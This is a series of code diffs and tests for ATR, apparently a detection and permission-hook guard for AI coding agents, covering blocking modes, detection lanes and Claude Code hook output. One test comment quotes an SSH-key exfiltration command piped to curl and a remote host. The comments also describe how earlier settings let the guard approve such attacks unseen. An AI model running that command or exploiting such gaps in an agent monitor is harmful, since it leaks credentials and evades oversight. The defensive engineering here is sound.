+// Enforcement policy — the operator directive that turns blocking on.
+// Blocking is OFF by default; without it ATR reports and never blocks.
+export {
+  resolveLane,
+  resolveBlocking,
+  parseLane,
+  parseBooleanFlag,
+  isEnforcementAction,
+  DEFAULT_LANE,
+  DEFAULT_BLOCKING,
+  LANE_ENV_VAR,
+  BLOCKING_ENV_VAR,
+} from './enforcement.js';
+export type { EnvSource } from './enforcement.js';
 
 // Quality Standard — RFC-001 reference implementation
 export * as quality from './quality/index.js';

--- a/src/index.ts
+++ b/src/index.ts
@@ -103,12 +103,18 @@ export type { HookHandlerConfig, HookContractOptions } from './hook-handler.js';
 
 // Enforcement policy — the operator directive that turns blocking on.
 // Blocking is OFF by default; without it ATR reports and never blocks.
+//
+// Library callers want laneFromConfig / blockingFromConfig: they take an
+// explicit value and cannot read the environment. resolveEnforcementPolicy is
+// the CLI entry point and is the only function here that touches process.env —
+// resolveLane / resolveBlocking require an EnvSource argument, so nothing else
+// can reach it by accident.
 export {
+  laneFromConfig,
+  blockingFromConfig,
+  resolveEnforcementPolicy,
   resolveLane,
   resolveBlocking,
-  resolveLaneOrWarn,
-  resolveBlockingOrWarn,
-  resetEnforcementWarnings,
   parseLane,
   parseBooleanFlag,
   isEnforcementAction,
@@ -117,7 +123,7 @@ export {
   LANE_ENV_VAR,
   BLOCKING_ENV_VAR,
 } from './enforcement.js';
-export type { EnvSource } from './enforcement.js';
+export type { EnvSource, EnforcementPolicy } from './enforcement.js';
 
 // Quality Standard — RFC-001 reference implementation
 export * as quality from './quality/index.js';

--- a/src/mcp-server.ts
+++ b/src/mcp-server.ts
@@ -204,8 +204,14 @@ const TOOLS = [
 
 export async function createMCPServer(): Promise<Server> {
   const semantic = createSemanticJudgeFromConfig();
+  // Lane comes from ATR_LANE (the engine resolves it — see src/enforcement.ts);
+  // this server has no CLI surface of its own to carry a --lane flag. The
+  // blocking opt-in has no meaning here: these tools return matches and never
+  // execute a response action or emit a permission decision, so there is
+  // nothing for it to gate.
   const engine = new ATREngine({ rulesDir: RULES_DIR, semanticJudge: semantic.judge });
   const ruleCount = await engine.loadRules();
+  process.stderr.write(`[atr-mcp] lane=${engine.getLane()} (detection only, never blocks)\n`);
   if (semantic.enabled) {
     process.stderr.write('[atr-mcp] Semantic judge enabled for method=semantic rules\n');
   }

--- a/src/mcp-server.ts
+++ b/src/mcp-server.ts
@@ -17,6 +17,7 @@ import {
   CallToolRequestSchema,
 } from '@modelcontextprotocol/sdk/types.js';
 import { ATREngine } from './engine.js';
+import type { Lane } from './quality/rule-contract.js';
 import { handleScan } from './mcp-tools/scan.js';
 import { handleScanSkill } from './mcp-tools/scan-skill.js';
 import { handleListRules } from './mcp-tools/list-rules.js';
@@ -202,14 +203,27 @@ const TOOLS = [
   },
 ];
 
-export async function createMCPServer(): Promise<Server> {
+/** Options for {@link createMCPServer}. */
+export interface MCPServerOptions {
+  /**
+   * Detection lane. Explicit only — this function does not read `ATR_LANE`,
+   * because `./mcp` is an exported subpath and an embedder's detection breadth
+   * must not depend on the shell that happened to start the host process.
+   * `atr mcp` reads the environment and passes the result here.
+   */
+  readonly lane?: Lane;
+}
+
+export async function createMCPServer(options: MCPServerOptions = {}): Promise<Server> {
   const semantic = createSemanticJudgeFromConfig();
-  // Lane comes from ATR_LANE (the engine resolves it — see src/enforcement.ts);
-  // this server has no CLI surface of its own to carry a --lane flag. The
-  // blocking opt-in has no meaning here: these tools return matches and never
-  // execute a response action or emit a permission decision, so there is
-  // nothing for it to gate.
-  const engine = new ATREngine({ rulesDir: RULES_DIR, semanticJudge: semantic.judge });
+  // The blocking opt-in has no meaning here: these tools return matches and
+  // never execute a response action or emit a permission decision, so there is
+  // nothing for it to gate. Only the lane applies.
+  const engine = new ATREngine({
+    rulesDir: RULES_DIR,
+    semanticJudge: semantic.judge,
+    ...(options.lane ? { lane: options.lane } : {}),
+  });
   const ruleCount = await engine.loadRules();
   process.stderr.write(`[atr-mcp] lane=${engine.getLane()} (detection only, never blocks)\n`);
   if (semantic.enabled) {
@@ -269,8 +283,8 @@ export async function createMCPServer(): Promise<Server> {
   return server;
 }
 
-export async function startMCPServer(): Promise<void> {
-  const server = await createMCPServer();
+export async function startMCPServer(options: MCPServerOptions = {}): Promise<void> {
+  const server = await createMCPServer(options);
   const transport = new StdioServerTransport();
   await server.connect(transport);
 }
@@ -282,7 +296,16 @@ const isDirectExecution =
    process.argv[1].endsWith('mcp-server.ts'));
 
 if (isDirectExecution) {
-  startMCPServer().catch((err) => {
+  // Reading ATR_LANE is correct HERE and only here: this branch runs when the
+  // file is the process entry point, which makes it a CLI, not a library. An
+  // importer of the `./mcp` subpath never reaches this code, so its lane still
+  // comes from the explicit option.
+  const { resolveEnforcementPolicy } = await import('./enforcement.js');
+  const policy = resolveEnforcementPolicy();
+  for (const note of policy.notes) {
+    process.stderr.write(`[atr-mcp] ${note}\n`);
+  }
+  startMCPServer({ lane: policy.lane }).catch((err) => {
     process.stderr.write(`ATR MCP Server error: ${err instanceof Error ? err.message : String(err)}\n`);
     process.exit(1);
   });

--- a/tests/action-executor.test.ts
+++ b/tests/action-executor.test.ts
@@ -3,6 +3,10 @@
  *
  * Validates action deduplication, priority ordering, adapter delegation,
  * error handling, dry-run mode, and the onActionComplete callback.
+ *
+ * Cases whose subject is an action above the OBSERVE blast-radius tier pass
+ * `blocking: true`: dispatching those is opt-in and off by default. The default
+ * (suppressed, adapter untouched) is pinned in tests/enforcement.test.ts.
  */
 
 import { describe, it, expect, vi } from "vitest";
@@ -108,7 +112,7 @@ describe("ActionExecutor", () => {
       }),
     });
 
-    const executor = new ActionExecutor({ adapter });
+    const executor = new ActionExecutor({ adapter, blocking: true });
     // Provide actions in non-priority order
     const ctx = makeContext(["snapshot", "kill_agent", "alert"]);
 
@@ -133,7 +137,7 @@ describe("ActionExecutor", () => {
 
   it("calls the correct adapter method for each action type", async () => {
     const adapter = createMockAdapter();
-    const executor = new ActionExecutor({ adapter });
+    const executor = new ActionExecutor({ adapter, blocking: true });
 
     const ctx = makeContext(["block_input", "escalate"]);
     await executor.execute(ctx);
@@ -171,7 +175,7 @@ describe("ActionExecutor", () => {
 
   it("dry-run mode returns success without calling adapter", async () => {
     const adapter = createMockAdapter();
-    const executor = new ActionExecutor({ adapter, dryRun: true });
+    const executor = new ActionExecutor({ adapter, dryRun: true, blocking: true });
 
     const ctx = makeContext(["kill_agent", "alert"]);
     const results = await executor.execute(ctx);

--- a/tests/claude-code-contract.test.ts
+++ b/tests/claude-code-contract.test.ts
@@ -5,7 +5,11 @@
  * only honors a block when it reads hookSpecificOutput.permissionDecision. The
  * guard used to emit the generic { decision } shape, which Claude Code silently
  * ignores — so the hook looked installed and never actually blocked. These
- * tests pin the exact contract the host requires.
+ * tests pin the exact contract the host requires WHEN BLOCKING IS ENABLED.
+ *
+ * Blocking is opt-in and off by default, so these tests pass `{ blocking: true }`
+ * explicitly. The default (advisory) shape — no permissionDecision at all, never
+ * a downgrade to "allow" — is pinned in tests/enforcement.test.ts.
  */
 import { describe, it, expect } from 'vitest';
 import { toClaudeCodePreToolUse, toClaudeCodePostToolUse } from '../src/hook-handler.js';
@@ -17,7 +21,7 @@ const out = (o: Partial<HookOutput>): HookOutput =>
 describe('Claude Code PreToolUse contract', () => {
   it('emits hookSpecificOutput.permissionDecision that maps 1:1 from the verdict', () => {
     for (const decision of ['allow', 'ask', 'deny'] as const) {
-      const p = toClaudeCodePreToolUse(out({ decision, reason: `r-${decision}` }));
+      const p = toClaudeCodePreToolUse(out({ decision, reason: `r-${decision}` }), { blocking: true });
       const hso = p['hookSpecificOutput'] as Record<string, unknown>;
       expect(hso['hookEventName']).toBe('PreToolUse');
       expect(hso['permissionDecision']).toBe(decision);
@@ -26,7 +30,7 @@ describe('Claude Code PreToolUse contract', () => {
   });
 
   it('does NOT emit a top-level decision field Claude Code could misread', () => {
-    const p = toClaudeCodePreToolUse(out({ decision: 'deny', reason: 'blocked' }));
+    const p = toClaudeCodePreToolUse(out({ decision: 'deny', reason: 'blocked' }), { blocking: true });
     expect(p['decision']).toBeUndefined();
     // ATR verdict is preserved under a non-colliding key for logs / other consumers
     expect(p['atr_decision']).toBe('deny');
@@ -34,16 +38,17 @@ describe('Claude Code PreToolUse contract', () => {
 
   it('carries matched_rules through when present', () => {
     const p = toClaudeCodePreToolUse(
-      out({ decision: 'deny', matched_rules: Object.freeze(['ATR-2026-00001']) })
+      out({ decision: 'deny', matched_rules: Object.freeze(['ATR-2026-00001']) }),
+      { blocking: true }
     );
     expect(p['matched_rules']).toEqual(['ATR-2026-00001']);
   });
 
   it('falls back to message when reason is absent', () => {
-    const p = toClaudeCodePreToolUse({
-      decision: 'deny',
-      message: 'Blocked: exfil',
-    } as HookOutput);
+    const p = toClaudeCodePreToolUse(
+      { decision: 'deny', message: 'Blocked: exfil' } as HookOutput,
+      { blocking: true }
+    );
     const hso = p['hookSpecificOutput'] as Record<string, unknown>;
     expect(hso['permissionDecisionReason']).toBe('Blocked: exfil');
   });
@@ -51,14 +56,14 @@ describe('Claude Code PreToolUse contract', () => {
 
 describe('Claude Code PostToolUse contract', () => {
   it('blocks (decision: block) on a deny verdict — the tool already ran', () => {
-    const p = toClaudeCodePostToolUse(out({ decision: 'deny', reason: 'poisoned output' }));
+    const p = toClaudeCodePostToolUse(out({ decision: 'deny', reason: 'poisoned output' }), { blocking: true });
     expect(p['decision']).toBe('block');
     expect(p['reason']).toBe('poisoned output');
     expect(p['atr_decision']).toBe('deny');
   });
 
   it('blocks on ask too, and passes on allow', () => {
-    expect(toClaudeCodePostToolUse(out({ decision: 'ask' }))['decision']).toBe('block');
-    expect(toClaudeCodePostToolUse(out({ decision: 'allow' }))['decision']).toBeUndefined();
+    expect(toClaudeCodePostToolUse(out({ decision: 'ask' }), { blocking: true })['decision']).toBe('block');
+    expect(toClaudeCodePostToolUse(out({ decision: 'allow' }), { blocking: true })['decision']).toBeUndefined();
   });
 });

--- a/tests/claude-code-contract.test.ts
+++ b/tests/claude-code-contract.test.ts
@@ -5,11 +5,15 @@
  * only honors a block when it reads hookSpecificOutput.permissionDecision. The
  * guard used to emit the generic { decision } shape, which Claude Code silently
  * ignores — so the hook looked installed and never actually blocked. These
- * tests pin the exact contract the host requires WHEN BLOCKING IS ENABLED.
+ * tests pin the exact contract the host requires WHEN BLOCKING IS ENABLED AND
+ * THE VERDICT RESTRAINS.
  *
  * Blocking is opt-in and off by default, so these tests pass `{ blocking: true }`
- * explicitly. The default (advisory) shape — no permissionDecision at all, never
- * a downgrade to "allow" — is pinned in tests/enforcement.test.ts.
+ * explicitly. Two things are never emitted regardless: any decision at all while
+ * advisory, and `permissionDecision: "allow"` in either mode — "allow" is an
+ * affirmative approval that suppresses the host's own permission prompt, so ATR
+ * emitting it would make the host less safe than having no hook. The full
+ * matrix is pinned in tests/enforcement.test.ts.
  */
 import { describe, it, expect } from 'vitest';
 import { toClaudeCodePreToolUse, toClaudeCodePostToolUse } from '../src/hook-handler.js';
@@ -19,14 +23,27 @@ const out = (o: Partial<HookOutput>): HookOutput =>
   Object.freeze({ decision: 'allow', reason: 'x', ...o }) as HookOutput;
 
 describe('Claude Code PreToolUse contract', () => {
-  it('emits hookSpecificOutput.permissionDecision that maps 1:1 from the verdict', () => {
-    for (const decision of ['allow', 'ask', 'deny'] as const) {
+  it('emits hookSpecificOutput.permissionDecision that maps 1:1 from a restraining verdict', () => {
+    // 'allow' is deliberately absent from this list — it is not a decision ATR
+    // is willing to emit. See the next test.
+    for (const decision of ['ask', 'deny'] as const) {
       const p = toClaudeCodePreToolUse(out({ decision, reason: `r-${decision}` }), { blocking: true });
       const hso = p['hookSpecificOutput'] as Record<string, unknown>;
       expect(hso['hookEventName']).toBe('PreToolUse');
       expect(hso['permissionDecision']).toBe(decision);
       expect(hso['permissionDecisionReason']).toBe(`r-${decision}`);
     }
+  });
+
+  it('emits NO decision for an allow verdict, even with blocking on', () => {
+    const p = toClaudeCodePreToolUse(out({ decision: 'allow', reason: 'No rules matched.' }), {
+      blocking: true,
+    });
+    expect(p['hookSpecificOutput']).toBeUndefined();
+    expect(JSON.stringify(p)).not.toContain('permissionDecision');
+    // The verdict is still reported — omission is silence on the permission
+    // channel, not silence altogether.
+    expect(p['atr_decision']).toBe('allow');
   });
 
   it('does NOT emit a top-level decision field Claude Code could misread', () => {

--- a/tests/enforcement.test.ts
+++ b/tests/enforcement.test.ts
@@ -1,13 +1,16 @@
 /**
- * Enforcement policy: blocking is opt-in, and the lane finally has an entrance.
+ * Enforcement policy: ATR never approves, blocking is opt-in, and the lane
+ * finally has an entrance.
  *
  * WHAT THIS PINS
  *
- * 1. Blocking off (the default) must OMIT permissionDecision, never downgrade it
- *    to "allow". In the Claude Code PreToolUse contract "allow" is affirmative
- *    approval — it suppresses the host's own permission prompt — so a guard that
- *    answered "allow" where it used to answer "ask" would make the host LESS
- *    safe than having no hook at all.
+ * 1. ATR NEVER emits `permissionDecision: "allow"` — in either mode. It is not
+ *    a neutral value in the Claude Code PreToolUse contract; it is affirmative
+ *    approval that suppresses the host's own permission prompt. Measured on the
+ *    451 attacks in data/pint-benchmark/pint-corpus.json with blocking on and
+ *    lane=enforce: nothing matched (only maturity=stable rules may fire there)
+ *    and all 451 came back "allow" — ATR pre-approving exfiltration it had not
+ *    looked for. "No rule matched" is silence, and silence is an omitted field.
  *
  * 2. Blocking off must also stop the second channel. Before this, a benign
  *    `Bash{command:"ls -la"}` produced permissionDecision "allow" while the
@@ -16,10 +19,18 @@
  *    (alert / snapshot / shadow / escalate) must keep running — suppressing them
  *    would cost detection.
  *
- * 3. Blocking on must reproduce the historical severity+confidence matrix
- *    exactly, so turning the switch on is not a second behaviour to review.
+ * 3. Blocking on reproduces the historical severity+confidence matrix for the
+ *    decisions that RESTRAIN (deny / ask), so turning the switch on is not a
+ *    second behaviour to review. It does not restore the affirmative allow.
  *
- * 4. Detection is never affected by either switch. Same matches, same count,
+ * 4. THE LIBRARY DOES NOT READ THE ENVIRONMENT. ATREngine / ActionExecutor /
+ *    HookHandler take explicit config only; ATR_LANE and ATR_BLOCKING are read
+ *    by the CLI and passed down. `ATR_LANE=enforce` reaching an embedded engine
+ *    silently narrowed detection to maturity=stable — measured on the same 451
+ *    attacks: 451/451 samples with matches collapsed to 0/451, with no warning,
+ *    because 'enforce' is a perfectly valid value.
+ *
+ * 5. Detection is never affected by either switch. Same matches, same count,
  *    same severity, in both modes.
  *
  * The destructive/observational split is NOT redefined here: these tests read
@@ -30,14 +41,14 @@
 
 import { describe, it, expect, beforeEach, afterEach, vi } from 'vitest';
 import { spawnSync } from 'node:child_process';
-import { mkdtempSync, mkdirSync, writeFileSync, rmSync } from 'node:fs';
+import { mkdtempSync, mkdirSync, writeFileSync, rmSync, readFileSync } from 'node:fs';
 import { join } from 'node:path';
 import { tmpdir } from 'node:os';
 
 import {
-  resolveLaneOrWarn,
-  resolveBlockingOrWarn,
-  resetEnforcementWarnings,
+  laneFromConfig,
+  blockingFromConfig,
+  resolveEnforcementPolicy,
   DEFAULT_BLOCKING,
   DEFAULT_LANE,
   isEnforcementAction,
@@ -200,14 +211,57 @@ describe('enforcement policy resolution', () => {
     }
   });
 
+  // The two switches used to disagree about case: ATR_BLOCKING was insensitive,
+  // ATR_LANE was not. `ATR_LANE=ENFORCE ATR_BLOCKING=ON` therefore turned
+  // blocking ON while silently widening the lane to hunt — the operator asked
+  // for the narrowest enforcement posture and got the broadest, which is the
+  // one direction the fallback must never go.
+  it('parses both switches case-insensitively, with the same trimming', () => {
+    for (const v of ['ENFORCE', 'Enforce', '  eNfOrCe  ']) {
+      expect(resolveLane(undefined, { ATR_LANE: v })).toBe('enforce');
+      expect(parseLane(v)).toBe('enforce');
+    }
+    expect(resolveLane('ALERT', {})).toBe('alert');
+    for (const v of ['ON', 'On', ' YES ', 'TRUE']) {
+      expect(resolveBlocking(undefined, { ATR_BLOCKING: v })).toBe(true);
+    }
+    for (const v of ['OFF', 'Off', ' NO ', 'FALSE']) {
+      expect(resolveBlocking(undefined, { ATR_BLOCKING: v })).toBe(false);
+    }
+  });
+
+  it('the dangerous pair no longer silently widens the lane', () => {
+    const policy = resolveEnforcementPolicy({}, { ATR_LANE: 'ENFORCE', ATR_BLOCKING: 'ON' });
+    expect(policy.lane).toBe('enforce');
+    expect(policy.blocking).toBe(true);
+    expect(policy.notes).toEqual([]);
+  });
+
   it('throws on an unrecognised value instead of silently falling back', () => {
     // A silent fallback is the worst failure mode here: the operator believes
     // they configured enforcement and they did not.
-    expect(() => resolveLane('enfroce')).toThrow(/Invalid lane/);
+    expect(() => resolveLane('enfroce', {})).toThrow(/Invalid lane/);
     expect(() => resolveLane(undefined, { ATR_LANE: 'block' })).toThrow(/ATR_LANE/);
     expect(() => resolveBlocking(undefined, { ATR_BLOCKING: 'enabled' })).toThrow(/ATR_BLOCKING/);
     expect(parseLane('nope')).toBeNull();
     expect(parseBooleanFlag('maybe')).toBeNull();
+  });
+
+  // The lane validated its explicit value from the start; blocking did not, and
+  // every non-empty string is truthy — so `blocking: "false"` read as an
+  // explicit "off" by its author and turned enforcement ON.
+  it('rejects a non-boolean explicit blocking value, "false" above all', () => {
+    for (const bad of ['false', 'true', 'no', '', 0, 1, null] as unknown[]) {
+      expect(() => resolveBlocking(bad as boolean, {})).toThrow(TypeError);
+      expect(() => blockingFromConfig(bad as boolean)).toThrow(/Expected a boolean/);
+    }
+    // The string that motivated the check is named in the message, because the
+    // author of `blocking: "false"` needs to be told why their "off" was an on.
+    expect(() => blockingFromConfig('false' as unknown as boolean)).toThrow(/"false"/);
+    // Real booleans still pass through untouched.
+    expect(blockingFromConfig(true)).toBe(true);
+    expect(blockingFromConfig(false)).toBe(false);
+    expect(blockingFromConfig(undefined)).toBe(DEFAULT_BLOCKING);
   });
 
   it('derives the enforce/observe split from the blast-radius ladder', () => {
@@ -238,45 +292,6 @@ describe('lane has a real entrance', () => {
     expect(engine.getLane()).toBe('enforce');
   });
 
-  it('takes the lane from ATR_LANE when config is silent', async () => {
-    process.env['ATR_LANE'] = 'alert';
-    const engine = await loadedEngine();
-    expect(engine.getLane()).toBe('alert');
-  });
-
-  it('prefers explicit config over ATR_LANE', async () => {
-    process.env['ATR_LANE'] = 'hunt';
-    const engine = await loadedEngine({ lane: 'enforce' });
-    expect(engine.getLane()).toBe('enforce');
-  });
-
-  // This expectation was the reverse until review measured what it costs.
-  // Throwing here meant `ATR_BLOCKING=enabled npx atr guard` exited 1 with an
-  // empty stdout and no guard at all, and a typo'd ATR_LANE in a shell profile
-  // crashed the VS Code extension from this constructor. Neither of those
-  // processes asked to read the environment; the environment is ambient.
-  //
-  // So the constructor warns and falls back, and the throwing resolver stays
-  // for an explicit argument, which is the caller's own bug. The warning is the
-  // part that matters -- a silent fallback here would be the failure the
-  // throwing version existed to prevent.
-  it('an invalid ATR_LANE warns and falls back rather than crashing the caller', () => {
-    process.env['ATR_LANE'] = 'enfroce';
-    const seen: string[] = [];
-    const write = process.stderr.write;
-    (process.stderr as { write: unknown }).write = (chunk: string) => {
-      seen.push(String(chunk));
-      return true;
-    };
-    try {
-      const engine = new ATREngine({ rules: [fixtureRule()] });
-      expect(engine.getLane()).toBe('hunt');
-    } finally {
-      (process.stderr as { write: unknown }).write = write;
-    }
-    expect(seen.join('')).toMatch(/ATR_LANE/);
-  });
-
   it('an explicit invalid lane still throws', () => {
     expect(() => new ATREngine({ rules: [fixtureRule()], lane: 'enfroce' as never })).toThrow(
       /lane/i,
@@ -287,10 +302,74 @@ describe('lane has a real entrance', () => {
     const hunt = await loadedEngine();
     expect(hunt.evaluate(markerEvent()).length).toBeGreaterThan(0);
 
-    process.env['ATR_LANE'] = 'enforce';
-    const enforce = await loadedEngine();
+    const enforce = await loadedEngine({ lane: 'enforce' });
     expect(enforce.getLane()).toBe('enforce');
     expect(enforce.evaluate(markerEvent())).toHaveLength(0);
+  });
+});
+
+// --- 2b. the library does not read the environment ------------------------
+
+describe('ATR_LANE / ATR_BLOCKING do not reach a library constructor', () => {
+  // `new ATREngine()` inside a VS Code extension, a Mastra pipeline, or the
+  // /mcp, /openshell-filter and /nemoclaw-preflight subpaths never asked to be
+  // reconfigured by a shell profile. And because 'enforce' is a VALID value,
+  // the old behaviour produced no warning at all while silently narrowing those
+  // callers to maturity=stable rules only.
+  it('ATR_LANE=enforce leaves an embedded engine in hunt, and still detecting', async () => {
+    process.env['ATR_LANE'] = 'enforce';
+
+    const engine = await loadedEngine();
+    expect(engine.getLane()).toBe('hunt');
+
+    // CONTROL: the environment variable is really set and really valid, so a
+    // failure here means it was ignored on purpose — not that the value was
+    // rejected or the test forgot to set it.
+    expect(process.env['ATR_LANE']).toBe('enforce');
+    expect(parseLane(process.env['ATR_LANE']!)).toBe('enforce');
+
+    // The detection this used to cost: a maturity=test rule keeps firing.
+    expect(engine.evaluate(markerEvent()).length).toBeGreaterThan(0);
+  });
+
+  it('a typo in ATR_LANE cannot throw out of the constructor either', async () => {
+    process.env['ATR_LANE'] = 'enfroce';
+    const engine = await loadedEngine();
+    expect(engine.getLane()).toBe('hunt');
+    expect(engine.evaluate(markerEvent()).length).toBeGreaterThan(0);
+  });
+
+  it('ATR_BLOCKING=1 does not arm an embedded executor', async () => {
+    process.env['ATR_BLOCKING'] = '1';
+    const engine = await loadedEngine();
+    const adapter = new RecordingAdapter();
+    const executor = new ActionExecutor({ adapter });
+
+    expect(executor.isBlocking()).toBe(false);
+    await engine.evaluateWithVerdict(markerEvent(), executor);
+
+    // CONTROL: alert/snapshot prove the executor reached the adapter at all, so
+    // the missing blockTool is suppression rather than a dead code path.
+    expect(adapter.calls).toContain('alert');
+    expect(adapter.calls).toContain('snapshot');
+    expect(adapter.calls).not.toContain('blockTool');
+  });
+
+  it('ATR_BLOCKING=1 does not arm an embedded HookHandler', async () => {
+    process.env['ATR_BLOCKING'] = '1';
+    const handler = new HookHandler({
+      engine: await loadedEngine(),
+      executor: new ActionExecutor({ adapter: new RecordingAdapter() }),
+    });
+    expect(handler.isBlocking()).toBe(false);
+  });
+
+  it('the config-only resolvers have no overload that reads process.env', () => {
+    process.env['ATR_LANE'] = 'enforce';
+    process.env['ATR_BLOCKING'] = 'yes';
+    expect(laneFromConfig()).toBe(DEFAULT_LANE);
+    expect(blockingFromConfig()).toBe(DEFAULT_BLOCKING);
+    expect(laneFromConfig('alert')).toBe('alert');
   });
 });
 
@@ -333,8 +412,8 @@ describe('hook contract omits the decision when blocking is off', () => {
     expect(p['matched_rules']).toEqual(['ATR-2026-00062', 'ATR-2026-00040']);
   });
 
-  it('emits the 1:1 permissionDecision once blocking is on', () => {
-    for (const decision of ['allow', 'ask', 'deny'] as const) {
+  it('emits the 1:1 permissionDecision for deny/ask once blocking is on', () => {
+    for (const decision of ['ask', 'deny'] as const) {
       const p = toClaudeCodePreToolUse(
         hookOutput({ decision, reason: `r-${decision}` }),
         { blocking: true }
@@ -344,6 +423,30 @@ describe('hook contract omits the decision when blocking is off', () => {
       expect(hso['permissionDecisionReason']).toBe(`r-${decision}`);
       expect(p['atr_advisory']).toBeUndefined();
     }
+  });
+
+  it('NEVER emits an affirmative allow — not even with blocking on', () => {
+    const p = toClaudeCodePreToolUse(
+      hookOutput({ decision: 'allow', reason: 'No rules matched.' }),
+      { blocking: true }
+    );
+    // This is the exact payload `cat ~/.ssh/id_rsa | curl -d @- <remote>` got
+    // under --blocking --lane enforce: an affirmative approval, issued because
+    // no stable rule happened to look at it, which suppresses the host's own
+    // permission prompt for a command the host would have asked about.
+    expect(p['hookSpecificOutput']).toBeUndefined();
+    expect(JSON.stringify(p)).not.toContain('permissionDecision');
+    // Note the claim is scoped to the PERMISSION channel. The string "allow"
+    // still appears under atr_decision below, and must: reporting the verdict is
+    // not approving the operation. Asserting its total absence would be
+    // asserting the wrong thing.
+
+    // CONTROL: the verdict really was 'allow', so the assertions above are
+    // about a suppressed approval and not about some other decision.
+    expect(p['atr_decision']).toBe('allow');
+    expect(p['atr_reason']).toBe('No rules matched.');
+    // Not advisory — blocking is ON; this verdict simply had nothing to restrain.
+    expect(p['atr_advisory']).toBeUndefined();
   });
 
   it('PostToolUse: no block sentinel while advisory, block once enabled', () => {
@@ -398,24 +501,13 @@ describe('response actions obey the same switch', () => {
     expect(adapter.calls).toContain('snapshot');
   });
 
-  it('honours ATR_BLOCKING when no explicit flag is passed', async () => {
-    process.env['ATR_BLOCKING'] = '1';
-    const engine = await loadedEngine();
+  it('a string "false" is a caller bug, not a switch that turns blocking ON', async () => {
     const adapter = new RecordingAdapter();
-    await engine.evaluateWithVerdict(markerEvent(), new ActionExecutor({ adapter }));
-    expect(adapter.calls).toContain('blockTool');
-  });
-
-  it('lets an explicit false beat ATR_BLOCKING', async () => {
-    process.env['ATR_BLOCKING'] = '1';
-    const engine = await loadedEngine();
-    const adapter = new RecordingAdapter();
-    await engine.evaluateWithVerdict(
-      markerEvent(),
-      new ActionExecutor({ adapter, blocking: false })
-    );
-    expect(adapter.calls).not.toContain('blockTool');
-    expect(adapter.calls).toContain('alert');
+    expect(
+      () => new ActionExecutor({ adapter, blocking: 'false' as unknown as boolean })
+    ).toThrow(TypeError);
+    // Nothing was constructed, so nothing could have been dispatched.
+    expect(adapter.calls).toEqual([]);
   });
 
   it('reports every suppressed action instead of dropping it silently', async () => {
@@ -499,12 +591,12 @@ describe('HookHandler carries the policy', () => {
     expect(JSON.stringify(payload)).not.toContain('permissionDecision');
   });
 
-  it('picks blocking up from ATR_BLOCKING', async () => {
-    process.env['ATR_BLOCKING'] = 'true';
+  it('takes blocking from explicit config only', async () => {
     const engine = await loadedEngine();
     const handler = new HookHandler({
       engine,
-      executor: new ActionExecutor({ adapter: new RecordingAdapter() }),
+      executor: new ActionExecutor({ adapter: new RecordingAdapter(), blocking: true }),
+      blocking: true,
     });
     expect(handler.isBlocking()).toBe(true);
   });
@@ -651,12 +743,24 @@ test_cases:
     expect(lines[0]!['matched_rules']).toEqual(['ATR-2026-09102']);
   });
 
-  it('--lane enforce keeps a maturity=test rule from firing at all', () => {
+  it('--lane enforce keeps a maturity=test rule from firing, and approves nothing', () => {
     const { status, lines, stderr } = runGuard(['--lane', 'enforce', '--blocking']);
     expect(status, stderr).toBe(0);
     expect(lines[0]!['matched_rules']).toBeUndefined();
-    expect(hso(lines[0]!)['permissionDecision']).toBe('allow');
     expect(stderr).toContain('lane=enforce');
+
+    // THE REGRESSION THIS EXISTS FOR. This exact invocation used to answer
+    // permissionDecision "allow" to every input the enforce lane did not look
+    // at — an affirmative approval that suppresses Claude Code's own permission
+    // prompt. Not matching must mean silence.
+    expect(lines[0]!['hookSpecificOutput']).toBeUndefined();
+    expect(hso(lines[0]!)['permissionDecision']).toBeUndefined();
+    expect(JSON.stringify(lines[0])).not.toContain('permissionDecision');
+    // CONTROL: blocking really is on for this run, so the omission is about the
+    // verdict rather than about the mode.
+    expect(stderr).toContain('blocking=on');
+    expect(lines[0]!['atr_advisory']).toBeUndefined();
+    expect(lines[0]!['atr_decision']).toBe('allow');
   });
 
   it('ATR_LANE does the same, and --lane overrides it', () => {
@@ -680,73 +784,292 @@ test_cases:
     expect(status).toBe(1);
     expect(stderr).toContain('mutually exclusive');
   });
+
+  it('a typo in ATR_BLOCKING warns but still starts the guard and still detects', () => {
+    const { status, lines, stderr } = runGuard([], { ATR_BLOCKING: 'enabled' });
+    // Exit 0 is the point: as a Claude Code command hook, a non-zero status is
+    // mapped to a non-blocking error whose stderr is never rendered, so exiting
+    // would silently cost the detection below and explain nothing.
+    expect(status, stderr).toBe(0);
+    expect(stderr).toContain('NOT enabled');
+    expect(stderr).toContain('blocking=off');
+    // Detection survived the typo — this is what exiting would have thrown away.
+    expect(lines[0]!['matched_rules']).toEqual(['ATR-2026-09102']);
+    expect(hso(lines[0]!)['permissionDecision']).toBeUndefined();
+  });
+
+  it('a typo in ATR_LANE warns, keeps detecting, and refuses to block', () => {
+    const { status, lines, stderr } = runGuard(['--blocking'], { ATR_LANE: 'enfroce' });
+    expect(status, stderr).toBe(0);
+    expect(stderr).toContain('Blocking disabled');
+    expect(stderr).toContain('lane=hunt');
+    expect(stderr).toContain('blocking=off');
+    // Full-breadth detection is retained; only enforcement is withheld, because
+    // blocking on the wider fallback lane is not what the operator asked for.
+    expect(lines[0]!['matched_rules']).toEqual(['ATR-2026-09102']);
+    expect(hso(lines[0]!)['permissionDecision']).toBeUndefined();
+  });
 });
 
-describe('ambient environment must not crash a library constructor', () => {
-  // A stray ATR_BLOCKING=enabled used to exit the guard with status 1 and an
-  // empty stdout -- landing hardest on the operator who was trying to turn
-  // enforcement ON. A typo'd ATR_LANE crashed the VS Code extension from the
-  // ATREngine constructor. Neither process asked to read the environment.
-  //
-  // The throwing resolvers stay for explicit arguments, which are the caller's
-  // own bug. The OrWarn wrappers exist for the ambient case: loud on stderr,
-  // safe default, process survives. Loud is what keeps this from being the
-  // silent fallback the throwing version exists to prevent.
-  beforeEach(() => resetEnforcementWarnings());
+// --- 7. `atr scan --lane` and the GitHub Action's `lane:` input -------------
 
-  it('an unparseable ATR_LANE warns and falls back instead of throwing', () => {
-    const seen: string[] = [];
-    const write = process.stderr.write;
-    (process.stderr as { write: unknown }).write = (chunk: string) => {
-      seen.push(String(chunk));
-      return true;
-    };
+describe('atr scan --lane end to end', () => {
+  // This plumbing shipped with no test at all: `--lane` could be deleted from
+  // the CLI, from ScanOptions, and from both engine construction sites and the
+  // whole suite stayed green. These run the real binary against a real rules
+  // directory and assert on the scan's own JSON output.
+
+  const RULE_ID = 'ATR-2026-09103';
+  const RULE_YAML = `title: "Scan lane fixture"
+id: ${RULE_ID}
+rule_version: 1
+status: experimental
